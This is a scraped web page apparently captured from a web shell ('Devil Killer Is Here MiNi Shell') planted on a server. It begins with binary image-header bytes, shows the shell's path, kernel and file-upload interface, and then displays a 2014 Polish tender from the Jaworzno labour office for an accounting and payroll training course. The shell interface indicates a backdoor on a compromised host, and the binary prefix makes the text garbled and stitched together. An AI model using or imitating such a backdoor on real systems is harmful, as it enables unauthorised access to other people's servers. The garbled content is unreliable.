JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141212/257679-N-2014.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowego szkolenia osób bezrobotnych w ramach Projektu Kuźnia przyszłych pracowników współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Poddziałania 7.2.1 Programu Operacyjnego Kapitał Ludzki w następującym zakresie:
Księgowość z elementami kadr i płac - 5 osób w I edycji,</b><br>
<b>Numer ogłoszenia: 257679 - 2014; data zamieszczenia: 12.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-jaworzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowego szkolenia osób bezrobotnych w ramach Projektu Kuźnia przyszłych pracowników współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Poddziałania 7.2.1 Programu Operacyjnego Kapitał Ludzki w następującym zakresie:
Księgowość z elementami kadr i płac - 5 osób w I edycji,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowego szkolenia osób bezrobotnych w ramach Projektu Kuźnia przyszłych pracowników współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Poddziałania 7.2.1 Programu Operacyjnego Kapitał Ludzki w następującym zakresie:
Księgowość z elementami kadr i płac - 5 osób w I edycji, 
Czas realizacji: nie dłużej niż 5 tygodni. 
Program szkolenia: minimalna ilość godzin - 180, w tym minimum  130 godzin ćwiczeń.
Program szkolenia musi zawierać:1. modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy                 	bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi: 1) ogólne zasady rachunkowości, zawierająca następujące jednostki szkoleniowe: regulacje prawne rachunkowości; istota i zakres rachunkowości; zasady rachunkowości; 2) środki gospodarcze i źródła ich pochodzenia, zawierająca następujące jednostki szkoleniowe: istota i zakres majątku trwałego; struktura majątku obrotowego; treść i formy organizacyjno-prawne kapitałów własnych; struktura kapitałów obcych; treść, układ, cechy bilansu;3) ewidencja operacji gospodarczych, zawierająca następujące jednostki szkoleniowe:operacje gospodarcze i ich wpływ na bilans; istota i rodzaje kont księgowych; funkcjonowanie kont księgowych; wynik finansowy; poprawianie błędów księgowych; rozdzielność i łączenie kont; 4)organizacja rachunkowości w jednostkach gospodarczych, zawierająca następujące jednostki szkoleniowe: plan kont; zadania i klasyfikacja dokumentów; powstanie i wykorzystanie dokumentu księgowego; obieg i archiwizowanie dokumentów;5) ogólne zasady inwentaryzacji, zawierająca następujące jednostki szkoleniowe:regulacje prawne inwentaryzacji; istota i zadania inwentaryzacji; rodzaje inwentaryzacji i metody jej przeprowadzania; przygotowanie jednostki gospodarczej do inwentaryzacji; 6) ewidencja obrotu gotówkowego, zawierająca następujące jednostki szkoleniowe: prowadzenie obrotu gotówkowego; sporządzanie asygnat kasowych; sporządzanie bankowego dowodu wpłaty;  sporządzanie raportu kasowego; zasady przewozu i przechowywania gotówki; ewidencja księgowa obrotu gotówkowego;7) ewidencja obrotu bezgotówkowego, zawierająca następujące jednostki szkoleniowe: formy i zasady obrotu bezgotówkowego; sporządzanie polecenia przelewu; sporządzanie czeku rozrachunkowego; akredytywa; ewidencja księgowa obrotu bezgotówkowego; ewidencja kredytów bankowych; 8) ewidencja innych środków pieniężnych, zawierająca następujące jednostki szkoleniowe:istota i formy innych środków pieniężnych;obrót wekslowy;ewidencja księgowa innych środków pieniężnych; 9) sporządzanie list płac i rozdzielników, zawierająca następujące jednostki szkoleniowe:
formy płac i systemy wynagrodzeń; karty pracy - wynagrodzeń; wynagrodzenia za urlopy wypoczynkowe i okolicznościowe; wynagrodzenie brutto;wynagrodzenie za okres niezdolności do pracy z tytułu choroby;potrącenie na liście płac;inne świadczenia wynikające ze stosunku pracy;wypłaty z tytułu umowy zlecenia  i o dzieło;podział płac i narzutów;indywidualne karty wynagrodzeń; 10)   sporządzanie list zasiłków i deklaracji ZUS, zawierająca następujące jednostki szkoleniowe: podstawa wymiaru zasiłku;wysokość i wpłata zasiłku chorobowego;zasiłek macierzyński i porodowy;zasiłek opiekuńczy;zasiłek wychowawczy;ustalenie dochodu do zasiłku rodzinnego;wypłata zasiłku rodzinnego i pielęgnacyjnego;podstawa składek;
wysokość składek;deklaracje rozliczeniowe ZUS;rozliczanie składek i świadczeń
11)   rozliczanie podatku dochodowego od osób fizycznych, zawierająca następujące jednostki szkoleniowe:koszty uzyskania przychodu;stawki podatku dochodowego;
ustalenie zaliczki na podatek dochodowy;deklaracje miesięczne podatku dochodowego;roczne rozliczenie podatku dochodowego 12)   ewidencja rozrachunków z tytułu VAT, zawierająca następujące jednostki szkoleniowe:podatnicy VAT; czytanie podlegające opodatkowaniu/zwolnieniu;stawki podatku VAT;dowody stanowiące podstawę odliczenia VAT naliczonego;rejestr zakupu VAT;ustalenie podatku do odliczenia;rejestr sprzedaży VAT;księgowe ujęcie rozrachunków z tytuł VAT;deklaracje podatku od towarów i usług;analiza konta rozrachunków z tytułu VAT;13) ewidencja rozrachunków z dostawcami, zawierająca następujące jednostki szkoleniowe: wpisywanie dokumentów zakupu do rejestru;sprawdzenie dokumentów zobowiązań wb. dostawców;księgowe ujęcie rozrachunków z dostawcami;analizowanie rozrachunków z dostawcami; 14)   ewidencja rozrachunków z odbiorcami, zawierająca następujące jednostki szkoleniowe:sporządzanie dokumentów rozrachunku z odbiorcami z tytułu sprzedaży produktów;naliczanie odsetek, kar umownych, odszkodowań w związku z niedotrzymaniem warunków umowy;księgowe ujęcie rozrachunków z odbiorcami;analizowanie i weryfikacja rozrachunków z odbiorcami; 15)   ewidencja rozrachunków z pracownikami, zawierająca następujące jednostki szkoleniowe:księgowe ujęcie rozrachunków z tytułu wynagrodzeń; księgowe ujęcie innych rozrachunków z pracownikami; analizowanie rozrachunków z pracownikami; 16)   ewidencja rozrachunków publiczno - prawnych, zawierająca następujące jednostki szkoleniowe: rozrachunki z Urzędem Skarbowym;rozrachunki z ZUS;rozrachunki z innymi instytucjami publiczno-prawnymi;analizowanie innych rozrachunków publiczno-prawnych; 17) ewidencja pozostałych rozrachunków, zawierająca następujące jednostki szkoleniowe: rozrachunki z udziałowcami i akcjonariuszami;tytuły pozostałych rozrachunków; księgowe ujęcie pozostałych rozrachunków; obroty kont rozrachunkowych;salda kont pozostałych rozrachunków;windykacja należności;odsetki od nieterminowej realizacji zobowiązań; 18)ewidencja roszczeń, zawierająca następujące jednostki szkoleniowe: roszczenia z tytułu niedoborów i szkód; roszczenia z tytułu kwestionowanych należności; dokumentacja dochodzenia roszczeń; rezerwy należności; księgowe ujęcie roszczeń i rezerw; 19) ewidencja roszczeń barterowych, zawierająca następujące jednostki szkoleniowe:relacje wymiany barterowej;wycena transakcji barterowej;księgowe ujęcie transakcji barterowych; 20)   ewidencja inwestycji, zawierająca następujące jednostki szkoleniowe: koszty inwestycji;zakres rzeczowy inwestycji; wartość początkowa środków trwałych oddanych do użytkowania przed i po zakończeniu inwestycji; wartość inwestycji nie dających efektu gospodarczego;  księgowe ujęcie inwestycji; 21)   ewidencja środków trwałych,  zawierająca następujące jednostki szkoleniowe: klasyfikacja środków trwałych; wartość początkowa środków trwałych; metody amortyzacji środków trwałych; amortyzacja środków trwałych używanych i ulepszonych; zasady aktualizacji wartości początkowej środków trwałych; dokumentacja środków trwałych; ewidencja księgowa środków trwałych; ewidencja szczegółowa środków trwałych.22)   ewidencja finansowego majątku trwałego, zawierająca następujące jednostki szkoleniowe: składniki finansowego majątku trwałego; wartość początkowa finansowanego majątku trwałego; księgowe ujęcie finansowego majątku trwałego; różnice powstałe na dzień bilansowy przy wycenie finansowego majątku trwałego; odpisy aktualizujące wartość początkową finansowanego majątku trwałego.23)   ewidencja wartości niematerialnych i prawnych, zawierająca następujące jednostki szkoleniowe: charakterystyka wartości niematerialnych i prawnych; wartość początkowa wartości niematerialnych i prawnych; amortyzacja wartości niematerialnych i prawnych; księgowe ujęcie wartości niematerialnych i prawnych, 24) ewidencja leasingu, zawierająca następujące jednostki szkoleniowe: rodzaje leasingu; VAT w leasingu operacyjnym; VAT w leasingu finansowym; metody amortyzacji środków trwałych; księgowe ujęcie leasingu operacyjnego i finansowego.25)   ewidencja i rozliczanie zakupu towarów i opakowań, zawierająca następujące jednostki szkoleniowe: kontrola dokumentów zakupu i przyjęcia towarów i opakowań; marże handlowe; odchylenia od cen ewidencyjnych towarów; wycena i rozliczenie inwentaryzacji; księgowe ujęcie dokumentów zakupu towarów i opakowań. 26)   ewidencja zakupu usług, zawierająca następujące jednostki szkoleniowe: kontrola dokumentów zakupu usług;  księgowe ujęcie dokumentów zakupu usług. 27)   ewidencja i rozliczanie zakupu materiałów, zawierająca następujące jednostki szkoleniowe: kontrola dokumentów dotyczących zakupu materiałów; ceny ewidencyjne materiałów; rozliczenie inwentaryzacji;  księgowe ujęcie zakupu materiałów.28)   ewidencja zużycia materiałów, zawierająca następujące jednostki szkoleniowe: wycena dowodów rozchodu materiałów; rozliczanie odchyleń od cen ewidencyjnych i kosztów zakupu; księgowe ujęcie rozchodu - zużycia materiałów. 29)   rozliczenie kosztów handlowych,  zawierająca następujące jednostki szkoleniowe: ewidencja kosztów rodzajowych; rozdzielniki kosztów;  współczynniki kosztów zakupu i zarządu; rozliczenie międzyokresowe kosztów. 30)   ewidencja i rozliczenie kosztów przedsiębiorstwa, zawierająca następujące jednostki szkoleniowe: deklaracja dokumentów na konta kosztów; księgowanie dowodów na konta kosztów; rozliczenie kosztów produkcji pomocniczych;  rozliczenie międzyokresowe kosztów; rozliczenie kosztów zarządu; układ kalkulacyjny kosztów produkcji.31)   kalkulacja kosztu jednostkowego produktu, zawierająca następujące jednostki szkoleniowe:obliczanie ilości produktów; kalkulacja podziałowa prosta; kalkulacja podziałowa ze współczynnikiem;kalkulacja doliczeniowa; rozliczenie kosztów produkcji;obliczenie odchyleń od cen ewidencyjnych wyrobów gotowych. 32) ewidencja wyrobów gotowych, zawierająca następujące jednostki szkoleniowe: ewidencja przychodu wyrobów gotowych;  ewidencja rozchodu wyrobów gotowych; wycena arkuszy inwentaryzacji wyrobów gotowych; zestawienie różnic inwentaryzacyjnych; księgowanie różnic inwentaryzacyjnych. 33)   ewidencja sprzedaży towarów,  zawierająca następujące jednostki szkoleniowe: dokumenty sprzedaży towarów;
- konta księgowe sprzedaży towarów; odchylenia od cen ewidencyjnych;  wynik na sprzedaży towarów. 34)   ewidencja sprzedaży usług, zawierająca następujące jednostki szkoleniowe: dokumenty sprzedaży usług; konta księgowe sprzedaży usług; wynik na sprzedaży usług. 35)   ewidencja sprzedaży wyrobów gotowych, zawierająca następujące jednostki szkoleniowe: dokumenty sprzedaży wyrobów gotowych; wybór kont księgowych sprzedaży wyrobów gotowych;  odchylenia od cen ewidencyjnych; wynik na sprzedaży wyrobów gotowych. 36)   ustalenie wyniku finansowego, zawierająca następujące jednostki szkoleniowe:  przychody i koszty działalności operacyjnej; przychody i koszty działalności finansowej;  straty i zyski nadzwyczajne; metoda kalkulacyjna ustalania wyniku finansowego; metoda porównawcza ustalania wyniku finansowego. 37)   ewidencja wyniku finansowego, zawierająca następujące jednostki szkoleniowe:
- zmiany stanu produktów i ich wpływ na wynik finansowy;
- przeniesienie sald kont przychodów i kosztów na wynik finansowy;
- ewidencja przychodów i kosztów na koncie wynik finansowy ;
- wyznaczenie wyników cząstkowych oraz z całokształtu działalności.
38)   podział wyniku finansowego, zawierająca następujące jednostki szkoleniowe:
- ustalenie podatku dochodowego od osób prawnych lub fizycznych; 
- naliczanie dywidendy od funduszu założycielskiego;
- deklaracja podatku dochodowego od osób prawnych lub fizycznych oraz rozliczenie dywidendy; 
- przeznaczenie wyniku finansowego w ramach podziału fakultatywnego;
- księgowe rozliczenie wyniku finansowego.
39)   ewidencja funduszy i kapitałów własnych, zawierająca następujące jednostki szkoleniowe:
- rodzaje funduszy - kapitałów oraz tytuły ich przeznaczenia; 
- księgowe ujęcie funduszy - kapitałów własnych. 
40)   ewidencja funduszy specjalnych, zawierająca następujące jednostki szkoleniowe:
- źródła powstawania funduszy specjalnych oraz tytuły ich przeznaczenia;
- księgowe ujęcie funduszy specjalnych.
41)   sporządzanie sprawozdań, zawierająca następujące jednostki szkoleniowe:
- statut i rejestracja jednostki;
- bilansowa sprawozdawczość finansowa; 
- pozostała sprawozdawczość finansowa;
- zakres sprawozdawczości;
- sporządzanie sprawozdań wg określonych wzorów.
42)   sporządzanie bilansu, zawierająca następujące jednostki szkoleniowe:
- zamykanie ksiąg rachunkowych;
- wzory druków bilansowych; 
- konta bilansowe pozabilansowe i wynikowe;
- obroty i salda kont analitycznych i syntetycznych;
- grupowanie aktywów wg układu bilansowego; 
- grupowanie pasywów wg układu bilansowego;
- wycena składników bilansowych; 
- zestawienie stanu majątkowego jednostki - bilans;
- dane uzupełniające do bilansu;
- synchronizacja bilansu z innymi sprawozdaniami.
43)   sporządzanie sprawozdań z przepływu środków pieniężnych, zawierająca następujące jednostki                   	szkoleniowe:
-memoriałowa podstawa rachunku;
- kasowa podstawa rachunku;
- standardy rachunku przepływu środków pieniężnych;
- sprawozdanie z przepływu środków pieniężnych. 
44)   sporządzanie rachunku zysków i strat,  zawierająca następujące jednostki szkoleniowe:
- istota i treść rachunku wyników;
- wynik finansowy w ujęciu księgowym a rachunek zysków i strat;
- zestawienie przychodów i kosztów w układzie sprawozdania finansowego rachunek zysków i strat.
45)   analiza podstawowych wskaźników finansowych, zawierająca następujące jednostki szkoleniowe:
- materiały źródłowe analizy ekonomicznej;
- metody analizy ekonomicznej;
- analiza pionowa i pozioma leasingu;
- analiza pionowa i pozioma rachunku wyników;
- wskaźniki płynności;
- wskaźniki rentowności;
- wskaźniki sprawności działania;
- wskaźniki zarządzania długiem;
- formy prezentacji wyników analizy ekonomicznej.
46)   obsługa komputera w zakresie podstawowym,  zawierająca następujące jednostki szkoleniowe:
- budowa sprzętu komputerowego; 
- operacja na dyskach; 
- operacja na katalogach;
- operacja na plikach; 
- praca w oknach środowiska Windows; 
- zmiana parametrów systemu Windows;
- zarządzanie plikami w Windows; 
- praca z aplikacjami i przenoszenie obiektów w Windows.
- drukowanie dokumentów ze środowiska Windows. 
47)   arkusze kalkulacyjne w zastosowaniach  finansowo- księgowych, zawierająca następujące jednostki            szkoleniowe:
- podstawy arkusza kalkulacyjnego;
- wprowadzanie i edycja;
- formatowanie; 
- zapisywanie i odczytywanie arkuszy;
- funkcje wbudowane;
- tworzenie wykresów;
-modyfikacja wykresów;
- problemy typu co jeśli;
- scenariusz zdarzeń;
- funkcje trendu;
- drukowanie;
- praca z kilkoma arkuszami.
48)   obsługa programów płacowych, zawierająca następujące jednostki szkoleniowe:
- charakterystyka i budowa programu płace;
- zakładanie katalogów;
- opracowywanie listy płac;
- drukowanie listy płac i przelewów;
- raporty i zestawienia; 
- archiwizacja danych.  
49)   obsługa programów finansowo- księgowych, zawierająca następujące jednostki  szkoleniowe:
- charakterystyka i budowa programu f-k; 
- wprowadzanie danych do katalogów;
- wprowadzanie transakcji do księgi głównej i kasy; 
- wprowadzanie operacji gospodarczych do rejestru należności;
- wprowadzanie operacji gospodarczych do rejestru zobowiązań; 
- drukowanie rejestrów; 
- księgowanie;
- zestawienia;
- raporty finansowe;
- zamykanie okresów; 
- archiwizacja danych.
- suma godzin dla jednostek modułowych 46,47,48,49 - minimum 40 godzin
2. zgodnie z modułowym programem szkolenia zawodowego dla zawodu: księgowy, z zakresu: księgowy ds. płac 	i rozliczeń z ZUS (kod zawodu: 343201):  
1) wynagrodzenie za pracę - minimum 6 godzin, zawierająca następujące jednostki szkoleniowe:
-  płaca - jej funkcje i zasady ;
- elementy i składniki wynagrodzenia za pracę; 
-  minimalne wynagrodzenie za pracę;
-  systemy wynagrodzenia za pracę;
-  wzorcowa lista płac.
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 6 godzin;  zawierająca następujące 	jednostki szkoleniowe:
- prawo do wynagrodzenia;
- ochrona wynagrodzenia za pracę; 
- wgląd do dokumentacji płacowej; 
- potrącenia z wynagrodzenia za pracę; 
- rozliczenia publicznoprawne;
- odpowiedzialność pracodawcy przy wypłacie wynagrodzeń. 
3) rozliczenie składek ZUS - minimum 6 godzin; zawierająca następujące jednostki szkoleniowe:
- dokumenty zgłoszeniowe, rozliczeniowe i płatnicze; 
- zasady i tryb postępowania w sprawach rozliczenia składek;
- wypełnianie i przekazywanie dokumentów ubezpieczeniowych.
4) zasiłki z ubezpieczenia społecznego - minimum 6 godzin;  zawierająca następujące jednostki                                    	 szkoleniowe:
- zasiłek chorobowy i opiekuńczy;
- świadczenia rehabilitacyjne; 
- zasiłek macierzyński; 
- zasiłki rodzinne, pielęgnacyjne i wychowawcze. 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum 6 godzin; 	zawierająca następujące jednostki szkoleniowe:
- kapitał początkowy - jego istota i zadania 
- wniosek ZUS do pracodawców w sprawie kapitału początkowego; 
- kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego; 
- ustalenie kapitału początkowego.
3.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy- minimum		20 godzin;
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 15 godzin;
5.   jednostkę modułową: obsługa programu SYMFONIA w zakresie kadr i płac - minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę z zakresu                               księgowości oraz kadr i płac..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 25.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /Dz. U. Nr 236 poz. 2365/.
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał,                           że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej dwie usługi                       z zakresu Księgowość z elementami kadr i płac na minimum 5 osób. Zamawiający uzna  warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: księgowość oraz szkolenia z zakresu kadr i płac. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy
do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1)  wykładowcy prowadzący zajęcia teoretyczne,  praktyczne oraz ćwiczenia  muszą posiadać wykształcenie wyższe związane z tematyką prowadzonej jednostki modułowej lub wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe związane z tematyką prowadzonej jednostki modułowej.
2) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie 	zawodowe  w prowadzeniu zajęć zgodnych z tematyką prowadzonej jednostki modułowej.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
